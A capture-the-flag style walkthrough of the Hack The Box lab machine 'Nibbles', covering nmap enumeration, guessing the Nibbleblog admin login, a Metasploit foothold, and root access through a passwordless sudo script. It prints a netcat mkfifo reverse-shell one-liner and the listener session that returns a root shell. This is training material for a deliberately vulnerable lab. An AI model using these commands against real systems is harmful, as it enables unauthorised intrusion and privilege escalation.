Redhalo

hack the box walkthrough – Nibbles machine

Here we go again with a new walkthrough for the Hack The Box machine Nibbles!

It is an easy linux machine created by mrb3n beginning of 2018

Let’s jump it!

Enumeration

As usual, we start with our nmap enumeration scan to find out what we are dealing with:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.69.238
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-18 17:54 EST
Nmap scan report for 10.129.69.238
Host is up (0.035s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

I checked first the port 80 which an apache web server is listening:

Looking on the source code, I found a comment which let us know that a directory /nibbleblog/ is existing

It brings me to a nibble CMS blog

I found on github the source code of the Nibbleblog then could found interresting information of our target.

First on the page update.php, the version installed is displayed:

Second on the config.xml I could discovered a potential admin user:

Third the file users.xml showed me that there is a sort of IP blacklist after 5 unsuccessful login attempts:

It means no brute force.. Let’s try to login with a pinch of salt then..

The login page is admin.php and I just tried with the user found in config.xml “admin” and a keyword found on the blog..

Bingo with admin / nibbles !!

FOOTHOLD

Looking then for an exploit with searchsploit I found one matching with our version to use with Metasploit:

Let’s give it a try:

Bingo ! we have our shell!

PRIVILEGE ESCALATION

Looking in the /home/nibbler folder I found out an archive personal.zip. I unzipped it with the following command:

[email protected]:/home/nibbler$ ls
ls
personal.zip  user.txt
[email protected]:/home/nibbler$ unzip personal.zip
unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh 

Looks like a legitimate script for having basic information on the host:

Internet:  Disconnected
Operating System Type :  GNU/Linux
OS Name : Ubuntu
UBUNTU_CODENAME=xenial
OS Version : 16.04.3 LTS (Xenial Xerus)
Architecture :  x86_64
Kernel Release :  4.4.0-104-generic
Hostname :  Nibbles
Internal IP :  10.129.69.238 dead:beef::250:56ff:feb9:92f9
External IP :  
Name Servers :  DO 1.1.1.1 8.8.8.8
Logged In users : 
Ram Usages : 
              total        used        free      shared  buff/cache   available
Mem:           974M        231M        226M         10M        516M        560M
Swap Usages : 
              total        used        free      shared  buff/cache   available
Swap:          1.0G          0B        1.0G
Disk Usages : 
Filesystem                    Size  Used Avail Use% Mounted on
/dev/sda1                     472M  133M  330M  29% /boot
Load Average :  0.00,0.00,0.00
System Uptime Days/(HH:MM) :  2:10

What I found then with the command sudo -l is that I can execute this script with root permission without password:

[email protected]:/home/nibbler/personal/stuff$ sudo -l                                                                                                                                                                                      
sudo -l                                                                                                                                                                                                                                    
sudo: unable to resolve host Nibbles: Connection timed out                                                                                                                                                                                 
Matching Defaults entries for nibbler on Nibbles:                                                                                                                                                                                          
    env_reset, mail_badpass,                                                                                                                                                                                                               
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin                                                                                                                                               
                                                                                                                                                                                                                                           
User nibbler may run the following commands on Nibbles:                                                                                                                                                                                    
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh 

Well, let’s edit the script to run a reverse shell with root right.

I watched the nc version installed on the target and create my command accordingly for OpenBSD:

which nc
/bin/nc
nc -h
OpenBSD netcat (Debian patchlevel 1.105-7ubuntu1)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
          [-P proxy_username] [-p source_port] [-q seconds] [-s source]
          [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [destination] [port]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f

Then I finished by creating a listener on my Kali machine and ran the script with the command:

[email protected]:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh

Then I was root!

[email protected]:~/Documents$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.10.14.105] from (UNKNOWN) [10.129.69.238] 32856
# whoami
root
# cd /root
# ls
root.txt